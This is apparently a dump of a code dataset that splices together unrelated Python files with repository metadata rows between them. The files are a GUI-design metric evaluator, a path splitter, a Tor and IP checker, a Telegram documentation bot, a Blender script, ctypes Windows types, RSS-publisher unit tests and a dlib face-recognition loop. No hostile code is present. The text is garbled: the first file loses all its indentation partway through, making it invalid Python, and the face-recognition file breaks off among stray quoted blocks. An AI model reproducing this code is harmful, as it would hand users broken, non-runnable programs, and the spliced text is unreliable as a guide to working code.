        if self.output_csv_file.exists():
            # Create DataFrame
            results_df: pd.DataFrame = pd.read_csv(self.output_csv_file)
            # Remove unfinished evaluation rows
            results_df = results_df.dropna()
            # Convert DataFrame to List
            self.results = results_df.to_dict("records")
        # No output CSV file (previous results) available
        else:
            self.results = []
    def _execute_metrics(self):
        """Run every metric in ``_METRICS`` on each not-yet-evaluated file.

        Resumes after ``len(self.results)`` files and persists the results
        after every file, so a crash loses at most one evaluation.
        """
        # Iterate over input GUI design files, skipping already-evaluated ones
        for input_gui_design_file in self.input_gui_design_files[
            len(self.results) :
        ]:
            logger.info("Evaluating {}...".format(input_gui_design_file.name))

            # Start total timer
            start_time_total: float = time.time()

            # Initialize GUI design results row
            results_row = {}
            results_row["filename"] = input_gui_design_file.name
            results_row["evaluation_date"] = date.today().isoformat()

            # Read GUI design image (PNG), timing the read
            start_time: float = time.time()
            gui_image_png_base64: str = image_utils.read_image(
                input_gui_design_file
            )
            end_time: float = time.time()
            results_row["read_image_time"] = round(end_time - start_time, 4)

            # Iterate over AIM metrics
            for metric in self._METRICS:
                # Import metric module dynamically by module name
                metric_module = importlib.import_module(
                    "aim.metrics." + metric
                )

                # Execute metric, timing it; the column prefix is e.g. "m1"
                start_time: float = time.time()
                metric_results: Optional[
                    List[Any]
                ] = metric_module.Metric.execute_metric(gui_image_png_base64)
                end_time: float = time.time()
                results_row[metric.partition("_")[0] + "_time"] = round(
                    end_time - start_time, 4
                )

                # Iterate over metrics results (floats are rounded, others kept)
                for index, metric_result in enumerate(metric_results):
                    if type(metric_result) is float:
                        results_row[
                            metric.partition("_")[0]
                            + "_result_"
                            + str(index + 1)
                        ] = round(metric_result, 4)
                    else:
                        results_row[
                            metric.partition("_")[0]
                            + "_result_"
                            + str(index + 1)
                        ] = metric_result

            # End total timer
            end_time_total: float = time.time()
            results_row["total_evaluation_time"] = round(
                end_time_total - start_time_total, 4
            )

            # Append results
            self.results.append(results_row)

            # Precaution against crashes: save results after each GUI design
            # evaluation instead of after completing all of them
            self._save_results()
def _save_results(self):
# Create DataFrame
results_df: pd.DataFrame = pd.DataFrame(self.results)
# Reorder columns
cols: List[str] = results_df.columns.tolist()
sorted(cols)
cols.remove("filename")
cols.remove("evaluation_date")
cols.remove("read_image_time")
cols.remove("total_evaluation_time")
cols = [
"filename",
"evaluation_date",
"total_evaluation_time",
"read_image_time",
] + cols
results_df = results_df[cols]
# Create directories, if needed
if not self.output_dir.exists():
self.output_dir.mkdir(parents=True)
# Save results
results_df.to_csv(self.output_csv_file, index=False)
def _reformat_large_tick_values(self, tick_val, pos):
"""
Turns large tick values (in the billions, millions and thousands) such as 4500 into 4.5K and also appropriately turns 4000 into 4K (no zero after the decimal).
Source: https://dfrieds.com/data-visualizations/how-format-large-tick-values.html
"""
if tick_val >= 1000000000:
val = round(tick_val / 1000000000, 1)
new_tick_format = "{:}B".format(val)
elif tick_val >= 1000000:
val = round(tick_val / 1000000, 1)
new_tick_format = "{:}M".format(val)
elif tick_val >= 1000:
val = round(tick_val / 1000, 1)
new_tick_format = "{:}K".format(val)
else:
new_tick_format = round(tick_val, 4)
# Make new_tick_format into a string value
new_tick_format = str(new_tick_format)
# Code below will keep 4.5M as is but change values such as 4.0M to 4M since that zero after the decimal isn't needed
index_of_decimal = new_tick_format.find(".")
if index_of_decimal != -1 and (tick_val >= 1000 or tick_val == 0):
value_after_decimal = new_tick_format[index_of_decimal + 1]
if value_after_decimal == "0":
# Remove the 0 after the decimal point since it's not needed
new_tick_format = (
new_tick_format[0:index_of_decimal]
+ new_tick_format[index_of_decimal + 2 :]
)
return new_tick_format
def _plot_results(self):
# Plot results
if self.plot_results:
# Get output CSV file (evaluation results)
evaluation_results_df = pd.read_csv(
self.output_csv_file,
header=0,
dtype={"filename": "str"},
parse_dates=[1],
)
# Plot metric evaluation results
width: int = 700 # in pixels
height: int = 500 # in pixels
dpi: int = 72
for key, value in self._METRIC_RESULTS.items():
# Create a new figure and configure it
sns.set(rc={"figure.figsize": (width / dpi, height / dpi)})
sns.set_style("ticks")
sns.set_context("paper", font_scale=1.5)
plt.figure()
# Plot data on a histogram and configure it
ax = sns.histplot(
list(evaluation_results_df[key]),
kde=False,
color="#7553A0",
bins=30,
)
ax.set_xlabel(
value["name"],
fontstyle="normal",
fontweight="normal",
labelpad=10,
)
ax.set_ylabel(
"Frequency",
fontstyle="normal",
fontweight="normal",
labelpad=10,
)
ax.xaxis.grid(False)
ax.yaxis.grid(False)
ax.xaxis.set_major_formatter(
ticker.FuncFormatter(self._reformat_large_tick_values)
)
sns.despine(ax=ax, left=False, bottom=False)
# Save plot
output_plot_file: Path = (
self.output_dir / "{}_evaluator.png".format(key)
)
plt.savefig(output_plot_file, dpi=dpi, transparent=False)
# Public methods
def evaluate(self):
self._set_input_csv_file()
self._set_input_gui_design_files()
self._set_results()
self._execute_metrics()
self._plot_results()
| 35.478964 | 167 | 0.532062 | 9,904 | 0.903402 | 0 | 0 | 0 | 0 | 0 | 0 | 3,211 | 0.292894 |
d31cf351b110249c4460fb2251ddbafce2b5a201 | 368 | py | Python | Traditional/split_path.py | hmarko/netapp-data-science-toolkit | ffec0eda608e79c20b628a7ac086cac1101843e8 | [
"BSD-3-Clause"
] | null | null | null | Traditional/split_path.py | hmarko/netapp-data-science-toolkit | ffec0eda608e79c20b628a7ac086cac1101843e8 | [
"BSD-3-Clause"
] | null | null | null | Traditional/split_path.py | hmarko/netapp-data-science-toolkit | ffec0eda608e79c20b628a7ac086cac1101843e8 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
import os
from posixpath import normpath
path = "///data/video/project1//"
normalized_path = os.path.normpath(path)
sep_path = normalized_path.split(os.sep)
path_tail = sep_path[-1] #last word in path - need to be volume name
currentPath = ''
for folder in sep_path:
if folder:
currentPath += "/"+folder
print (currentPath)
| 26.285714 | 68 | 0.703804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 96 | 0.26087 |
d31d05d65e96e8eb5e6db72874f6fcc4ab556220 | 2,325 | py | Python | http/torcheck.py | k11dd00/oniongen | 00d7992920c59de4a5584357a35494fbdde0a6d9 | [
"MIT"
] | null | null | null | http/torcheck.py | k11dd00/oniongen | 00d7992920c59de4a5584357a35494fbdde0a6d9 | [
"MIT"
] | 1 | 2021-11-09T02:38:38.000Z | 2021-11-09T02:38:38.000Z | http/torcheck.py | k11dd00/oniongen | 00d7992920c59de4a5584357a35494fbdde0a6d9 | [
"MIT"
] | null | null | null | # MIT License
#
# Copyright (c) 2018 k1dd00
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE
# -*- coding: utf-8; mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vim: fileencoding=utf-8 tabstop=4 expandtab shiftwidth=4
# pylint: disable=C0103,C0301,W1202,W0212
import urllib2
from BeautifulSoup import BeautifulSOAP
class TorCheck(object):
"""
The TorCheck class.
This class checks the tor status and ip address
"""
IP_CHECK_ENDPOINT = "http://icanhazip.com"
TOR_CHECK_ENDPOINT = "https://check.torproject.org"
def __init__(self):
self.text_key = "congratulations"
def check_ip(self):
"""
Checks the ip address
Returns
-------
ip: str
The ip address
"""
request = urllib2.urlopen(self.IP_CHECK_ENDPOINT)
response = request.read()
return response.strip()
def check_tor_status(self):
"""
Checks the tor status
Returns
-------
status: Bool
The tor status
"""
html = urllib2.urlopen(self.TOR_CHECK_ENDPOINT).read()
parsed_html = BeautifulSOAP(html)
content = parsed_html.body.find('h1', attrs={'class':'not'}).text
return self.text_key in content.lower()
| 32.746479 | 81 | 0.68086 | 975 | 0.419355 | 0 | 0 | 0 | 0 | 0 | 0 | 1,679 | 0.722151 |
d31d611e4b40f5de20572912a046b15c498ee7dd | 519 | py | Python | ObjectsName_to_Meshs/ObjectsName_to_Meshs.py | a2d4f3s1/Blender-Tips | e897f78a406243aa9959e226e13a7e214638179f | [
"MIT"
] | null | null | null | ObjectsName_to_Meshs/ObjectsName_to_Meshs.py | a2d4f3s1/Blender-Tips | e897f78a406243aa9959e226e13a7e214638179f | [
"MIT"
] | null | null | null | ObjectsName_to_Meshs/ObjectsName_to_Meshs.py | a2d4f3s1/Blender-Tips | e897f78a406243aa9959e226e13a7e214638179f | [
"MIT"
] | null | null | null | ## メッシュ名をオブジェクト名に変更し、メッシュリンクなオブジェクトを選択
import bpy
objects = bpy.data.objects
shareObjects = list()
## Deselect All
for object in objects:
bpy.context.scene.objects[(object.name)].select_set(False)
## Copy Name obj to mesh
for obj in objects:
if obj.data and obj.data.users == 1: ## if no shared mesh
obj.data.name = obj.name
else :
print (obj)
shareObjects.append(obj)
## Select Linked mesh obj
for obj in shareObjects:
bpy.context.scene.objects[(obj.name)].select_set(True)
| 23.590909 | 62 | 0.693642 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 192 | 0.325976 |
d31e759f50ddb0b000972b746bbc9dcd6c046e1e | 9,311 | py | Python | tgbotapi.py | suhasa010/tgbotapi-bot | 23894c7e239ca56cd1f5588bcda27c53b361f8da | [
"MIT"
] | 5 | 2020-12-20T21:36:27.000Z | 2021-05-09T08:26:04.000Z | tgbotapi.py | suhasa010/tgbotapi-bot | 23894c7e239ca56cd1f5588bcda27c53b361f8da | [
"MIT"
] | 1 | 2020-12-06T16:12:07.000Z | 2020-12-06T16:12:07.000Z | tgbotapi.py | suhasa010/tgbotapi-bot | 23894c7e239ca56cd1f5588bcda27c53b361f8da | [
"MIT"
] | 2 | 2020-12-06T16:03:52.000Z | 2021-01-17T03:36:33.000Z | from telegram.ext import Updater
import os
from dotenv import load_dotenv
load_dotenv()
BOT_API = os.getenv("BOT_API")
updater = Updater(token=BOT_API, use_context=True)
dispatcher = updater.dispatcher
import logging
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO)
def start(update, context):
context.bot.send_message(chat_id=update.effective_chat.id, text="Hi, I am here to help you browse the documentation of Telegram Bot API right here on Telegram using Instant View.")
from telegram.ext import CommandHandler
start_handler = CommandHandler('start', start)
dispatcher.add_handler(start_handler)
#def echo(update, context):
# context.bot.send_message(chat_id=update.effective_chat.id, text=update.message.text)
#from telegram.ext import MessageHandler, Filters
#echo_handler = MessageHandler(Filters.text & (~Filters.command), echo)
#dispatcher.add_handler(echo_handler)
# def caps(update, context):
# # if context.args == null:
# # context.bot.send_message(chat_id=update.effective_chat.id, text="send some text, you fool!")
# print("arguments are" + context.args)
# text_caps = ' '.join(context.args).upper()
# context.bot.send_message(chat_id=update.effective_chat.id, text=text_caps)
# caps_handler = CommandHandler('caps', caps)
# dispatcher.add_handler(caps_handler)
from uuid import uuid4
from telegram import InlineQueryResultArticle, InputTextMessageContent
def inline_caps(update, context):
query = update.inline_query.query
results = list()
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Telegram Bot API Documentation',
input_message_content=InputTextMessageContent("https://core.telegram.org/bots/api/?v=1", disable_web_page_preview=False),
description='Telegram Bot API Main page',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
#context.bot.answer_inline_query(update.inline_query.id, results)
#results = list()
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Announcements ➜ Recent Changes',
input_message_content=InputTextMessageContent("""Recent Changes\nhttps://core.telegram.org/bots/api/?v=1#recent-changes""", parse_mode='HTML'),
description='Telegram Bot API Announcements',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Making Requests',
input_message_content=InputTextMessageContent("""Making Requests\nhttps://core.telegram.org/bots/api/?v=1#making-requests""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Using a Local Bot API Server',
input_message_content=InputTextMessageContent("""Using a Local Bot API Server\nhttps://core.telegram.org/bots/api/?v=1#using-a-local-bot-api-server""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Getting Updates',
input_message_content=InputTextMessageContent("""Getting Updates\nhttps://core.telegram.org/bots/api/?v=1#getting-updates""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Available Types',
input_message_content=InputTextMessageContent("""Available Types\nhttps://core.telegram.org/bots/api/?v=1#available-types""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Available Methods',
input_message_content=InputTextMessageContent("""Available Methods\nhttps://core.telegram.org/bots/api/?v=1#available-methods""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Updating Messages',
input_message_content=InputTextMessageContent("""Updating Messages\nhttps://core.telegram.org/bots/api/?v=1#updating-messages""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Stickers',
input_message_content=InputTextMessageContent("""Stickers\nhttps://core.telegram.org/bots/api/?v=1#stickers""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Inline Mode',
input_message_content=InputTextMessageContent("""Inline Mode\nhttps://core.telegram.org/bots/api/?v=1#inline-mode""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Payments',
input_message_content=InputTextMessageContent("""Payments\nhttps://core.telegram.org/bots/api/?v=1#payments""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Telegram Passport',
input_message_content=InputTextMessageContent("""Telegram Passport\nhttps://core.telegram.org/bots/api/?v=1#telegram-passport""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Games',
input_message_content=InputTextMessageContent("""Games\nhttps://core.telegram.org/bots/api/?v=1#games""", parse_mode='HTML'),
description='Telegram Bot API Documentation',
thumb_url='https://play-lh.googleusercontent.com/ZU9cSsyIJZo6Oy7HTHiEPwZg0m2Crep-d5ZrfajqtsH-qgUXSqKpNA2FpPDTn-7qA5Q=s180',
thumb_width=30,
thumb_height=30
)
)
if query.lower() == 'format':
results = list()
results.append(
InlineQueryResultArticle(
id=uuid4(),
title='Request Format',
input_message_content=InputTextMessageContent("""<code>#request
Book's name
Author's name
#ebook or #audiobook
[Amazon link to audiobook/KU book, if applicable]</code>""", parse_mode='HTML'),
)
)
context.bot.answer_inline_query(update.inline_query.id, results)
from telegram.ext import InlineQueryHandler
inline_caps_handler = InlineQueryHandler(inline_caps)
dispatcher.add_handler(inline_caps_handler)
updater.start_polling() | 44.550239 | 184 | 0.671356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,254 | 0.456781 |
d31f11e2bab844fa68163cfc4bba33ce06b7e294 | 2,387 | py | Python | python/helpers/pydev/third_party/wrapped_for_pydev/ctypes/wintypes.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 695 | 2020-01-30T14:34:51.000Z | 2022-03-31T09:31:57.000Z | python/helpers/pydev/third_party/wrapped_for_pydev/ctypes/wintypes.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 1,095 | 2018-03-01T00:50:11.000Z | 2019-05-06T17:44:15.000Z | python/helpers/pydev/third_party/wrapped_for_pydev/ctypes/wintypes.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 111 | 2015-12-01T14:06:10.000Z | 2020-08-01T10:44:39.000Z | #@PydevCodeAnalysisIgnore
# XXX This module needs cleanup.
from ctypes import *
DWORD = c_ulong
WORD = c_ushort
BYTE = c_byte
ULONG = c_ulong
LONG = c_long
LARGE_INTEGER = c_longlong
ULARGE_INTEGER = c_ulonglong
HANDLE = c_ulong # in the header files: void *
HWND = HANDLE
HDC = HANDLE
HMODULE = HANDLE
HINSTANCE = HANDLE
HRGN = HANDLE
HTASK = HANDLE
HKEY = HANDLE
HPEN = HANDLE
HGDIOBJ = HANDLE
HMENU = HANDLE
LCID = DWORD
WPARAM = c_uint
LPARAM = c_long
BOOL = c_long
VARIANT_BOOL = c_short
LPCOLESTR = LPOLESTR = OLESTR = c_wchar_p
LPCWSTR = LPWSTR = c_wchar_p
LPCSTR = LPSTR = c_char_p
class RECT(Structure):
_fields_ = [("left", c_long),
("top", c_long),
("right", c_long),
("bottom", c_long)]
RECTL = RECT
class POINT(Structure):
_fields_ = [("x", c_long),
("y", c_long)]
POINTL = POINT
class SIZE(Structure):
_fields_ = [("cx", c_long),
("cy", c_long)]
SIZEL = SIZE
def RGB(red, green, blue):
return red + (green << 8) + (blue << 16)
class FILETIME(Structure):
_fields_ = [("dwLowDateTime", DWORD),
("dwHighDateTime", DWORD)]
class MSG(Structure):
_fields_ = [("hWnd", HWND),
("message", c_uint),
("wParam", WPARAM),
("lParam", LPARAM),
("time", DWORD),
("pt", POINT)]
MAX_PATH = 260
class WIN32_FIND_DATAA(Structure):
_fields_ = [("dwFileAttributes", DWORD),
("ftCreationTime", FILETIME),
("ftLastAccessTime", FILETIME),
("ftLastWriteTime", FILETIME),
("nFileSizeHigh", DWORD),
("nFileSizeLow", DWORD),
("dwReserved0", DWORD),
("dwReserved1", DWORD),
("cFileName", c_char * MAX_PATH),
("cAlternameFileName", c_char * 14)]
class WIN32_FIND_DATAW(Structure):
_fields_ = [("dwFileAttributes", DWORD),
("ftCreationTime", FILETIME),
("ftLastAccessTime", FILETIME),
("ftLastWriteTime", FILETIME),
("nFileSizeHigh", DWORD),
("nFileSizeLow", DWORD),
("dwReserved0", DWORD),
("dwReserved1", DWORD),
("cFileName", c_wchar * MAX_PATH),
("cAlternameFileName", c_wchar * 14)]
| 24.111111 | 53 | 0.553414 | 1,642 | 0.687893 | 0 | 0 | 0 | 0 | 0 | 0 | 508 | 0.212819 |
d31fa655ac64aa971997076b0728810b41a6b669 | 2,899 | py | Python | publishfeed/tests.py | RobertLD/publishfeed-OTC | b67192517706f5dfbe0210f5deaef258ae10d28d | [
"MIT"
] | 9 | 2017-06-08T18:13:33.000Z | 2021-11-02T12:41:46.000Z | publishfeed/tests.py | RobertLD/publishfeed-OTC | b67192517706f5dfbe0210f5deaef258ae10d28d | [
"MIT"
] | 4 | 2021-03-30T15:52:52.000Z | 2021-04-11T17:22:46.000Z | publishfeed/tests.py | RobertLD/publishfeed-OTC | b67192517706f5dfbe0210f5deaef258ae10d28d | [
"MIT"
] | 4 | 2020-11-26T23:20:16.000Z | 2022-03-03T12:20:25.000Z | import unittest
from models import FeedSet, Base, RSSContent
import config
import sqlalchemy
from sqlalchemy.orm import sessionmaker
from unittest.mock import MagicMock
from test_data.feedparser_data import fake_response
from helpers import RSSContentHelper, FeedSetHelper
class TestFeedSet(unittest.TestCase):
def setUp(self):
url = config.DB_TEST_URL
if not url:
self.skipTest("No database URL set")
engine = sqlalchemy.create_engine(url)
Base.metadata.drop_all(engine)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
self.session = Session()
feedparser_fake_response = fake_response
def feed_data_dict(self):
data = {
'urls': ['https://news.ycombinator.com/rss'],
'hashtags': '#example',
'twitter': {
'consumer_key': 'XXXXXXXXXXX',
'access_secret': 'XXXXXXXXXXXXXX',
'consumer_secret': 'XXXXXXXXXXXXXX',
'access_key': 'XXXXXXXXXXXX'
},
'name': 'SimpleItRocks'
}
return data
def test_get_twitter_credentials(self):
data = self.feed_data_dict()
feed = FeedSet(data)
keys = feed.twitter_keys
self.assertIsInstance(keys, dict)
self.assertIn('consumer_key', keys)
self.assertIn('access_key', keys)
self.assertIn('consumer_secret', keys)
self.assertIn('access_secret', keys)
def test_urls(self):
data = self.feed_data_dict()
feed = FeedSet(data)
urls = feed.urls
self.assertIsInstance(urls, list)
@unittest.mock.patch('feedparser.parse', return_value=feedparser_fake_response)
def test_save_new_pages(self, feedparser_fake_response):
self.assertEqual(len(self.session.query(RSSContent).all()), 0)
helper = FeedSetHelper(self.session, self.feed_data_dict())
helper.get_pages_from_feeds()
self.assertNotEqual(len(self.session.query(RSSContent).all()), 0)
@unittest.mock.patch('feedparser.parse', return_value=feedparser_fake_response)
def test_not_save_existing_pages(self, feedparser_fake_response):
# presave an item that is present in the retrieved feed, to check if it
# has not been saved after downloading new feeds
entry = fake_response.entries[0]
items_count = len(fake_response.entries)
rsscontent = RSSContent(title=entry.title, url=entry.link)
self.session.add(rsscontent)
self.assertEqual(len(self.session.query(RSSContent).all()), 1)
helper = FeedSetHelper(self.session, self.feed_data_dict())
helper.get_pages_from_feeds()
self.assertEqual(len(self.session.query(RSSContent).all()), items_count, "Entries count has changed")
if __name__ == '__main__':
unittest.main()
| 34.511905 | 109 | 0.660573 | 2,576 | 0.888582 | 0 | 0 | 1,169 | 0.403242 | 0 | 0 | 478 | 0.164884 |
d32237cf61ff2cf5d80f55993554fdb8e42b3f2c | 7,474 | py | Python | src/faceRecognition.py | lizenan/Face-Recognition | b0a7ce630cd93e111ae4b204bc7b466c74084d7d | [
"Unlicense"
] | 3 | 2018-03-01T23:13:10.000Z | 2018-07-10T01:41:55.000Z | src/faceRecognition.py | lizenan/Face-Recognition | b0a7ce630cd93e111ae4b204bc7b466c74084d7d | [
"Unlicense"
] | null | null | null | src/faceRecognition.py | lizenan/Face-Recognition | b0a7ce630cd93e111ae4b204bc7b466c74084d7d | [
"Unlicense"
] | null | null | null | ## -*- coding: utf-8 -*-
"""
Created on Tue Sep 26 13:38:17 2017
@author: Administrator
"""
import dlib
import cv2
import numpy as np
from sklearn.externals import joblib
import os
import pathAttributes
#ap = argparse.ArgumentParser()
#ap.add_argument("-p", "--shape-predictor", metavar="D:\\用户目录\\下载\\shape_predictor_68_face_landmarks.dat\\shape_predictor_68_face_landmarks.dat", required=True,
# help="path to facial landmark predictor")
#ap.add_argument("-r", "--picamera", type=int, default=-1,
#help="whether or not the Raspberry Pi camera should be used")
#args = vars(ap.parse_args())
def faceRecognition():
f = open(pathAttributes.dictionary, 'r')
result = {}
for line in f.readlines():
line = line.strip()
print(line)
if not len(line):
continue
result[line.split(':')[0]] = line.split(':')[1]
f.close()
#face_detection_model = "C:\\Users\\Administrator\\shape_predictor_68_face_landmarks.dat"
#print(result)
print("[INFO] loading facial landmark predictor...")
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(pathAttributes.face_detection_model)
face_encoder = dlib.face_recognition_model_v1(pathAttributes.face_recognition_model)
print("[INFO] camera sensor warming up...")
#vs = VideoStream().start()
video_capture = cv2.VideoCapture(0) #open camra by calling opencv's function
#time.sleep(2.0)
"""
chris_image = cv2.imread('E:\\49.png')
#chris_image_gray = cv2.cvtColor(chris_image, cv2.COLOR_GRAY2RGB)
chris = detector(chris_image, 1)
chris_shape = predictor(chris_image, chris[0])
chris_face_encoding = face_encoder.compute_face_descriptor(chris_image, chris_shape, 1)
print("Chris:"+str(chris_face_encoding))
julie_image = cv2.imread('E:\\1.png')
#julie_image_gray = cv2.cvtColor(julie_image, cv2.COLOR_GRAY2RGB)
julie = detector(julie_image, 1)
julie_shape = predictor(julie_image, julie[0])
julie_face_encoding = face_encoder.compute_face_descriptor(julie_image, julie_shape, 1)
print("JULIE:"+str(julie_face_encoding))
"""
face_locations = []
face_encodings = []
face_names = []
raw_list = []
while True:
raw_list = []
face_names = []
# grab the frame from the threaded video stream, resize it to
# have a maximum width of 400 pixels, and convert it to
# grayscale
#frame = vs.read()
#frame = imutils.resize(frame, width=400)
ret, frame = video_capture.read()
#dim = (int(frame.shape[1] * 0.25), int(frame.shape[0] * 0.25))
dim = (int(frame.shape[1] * 0.2), int(frame.shape[0] * 0.2))
small_frame = cv2.resize(frame, dim)
gray_one_channel = cv2.cvtColor(small_frame, cv2.COLOR_BGR2GRAY)
#face_locations = face_recognition.face_locations(small_frame)
gray = cv2.cvtColor(gray_one_channel, cv2.COLOR_GRAY2RGB)
# detect faces in the grayscale frame
rects = detector(gray, 1)
#print("rects:"+str(rects))
for rect in rects:
#print("rect:"+str(rect))
css = [rect.top(), rect.right(), rect.bottom(), rect.left()]
location = max(css[0], 0), min(css[1], gray.shape[1]), min(css[2], gray.shape[0]), max(css[3], 0)
face_location = dlib.rectangle(location[3], location[0], location[1], location[2])
face_locations.append(face_location)
raw_list.append(css)
shape = predictor(gray, face_location)
face_encoding = face_encoder.compute_face_descriptor(gray, shape, 1)
#print("random:"+str(face_encoding))
"""
match_chris = []
match_julie = []
chris_norm = 0
julie_norm = 0
if len([chris_face_encoding]) == 0:
match_chris = list(0<=0.6)
else:
chris_norm = np.linalg.norm(np.array([chris_face_encoding]) - np.array([face_encoding]), axis=1)
match_chris = list(chris_norm<= 0.6)
print("chris:"+str(chris_norm))
name = "Unknown"
if len([julie_face_encoding]) == 0:
match_julie = list(0<=0.6)
else:
julie_norm = np.linalg.norm(np.array([julie_face_encoding]) - np.array([face_encoding]), axis=1)
match_julie = list(julie_norm <= 0.6)
print("julie:"+str(julie_norm))
if match_chris[0]!=0 and match_julie[0]!=0:
if julie_norm>chris_norm:
name = "Chris"
else:
name = "Julie"
elif match_julie[0] == 0 and match_chris[0] !=0:
name = "Chris"
elif match_julie[0] != 0 and match_chris[0] ==0:
name = "Julie"
else:
name = "Unknown"
"""
threshold = -0.05 #-0.1 for C=0.1 4-8 6 for 0.3
proba = 0.72
clf = joblib.load(pathAttributes.SVM_model)
feeaturesArray = np.array(face_encoding)
ID = clf.predict(feeaturesArray.reshape(1,-1))[0]
name = result[str(ID)]
#scores = clf.decision_function(feeaturesArray.reshape(1,-1))
scores = clf.predict_proba(feeaturesArray.reshape(1,-1))
"""
scores_sorted = np.sort(scores)
second_biggest = scores_sorted[0][-2]
minimum = scores_sorted[0][0]
biggest_score = np.max(scores)
gap = biggest_score - minimum
gap_2 = biggest_score - second_biggest
print(gap_2)
percentage = gap_2/gap *100
print(percentage)
if percentage < 30:
name = "unknown"
""" """
biggest_score = np.max(scores)
if biggest_score < threshold:
name = "unknown"
"""
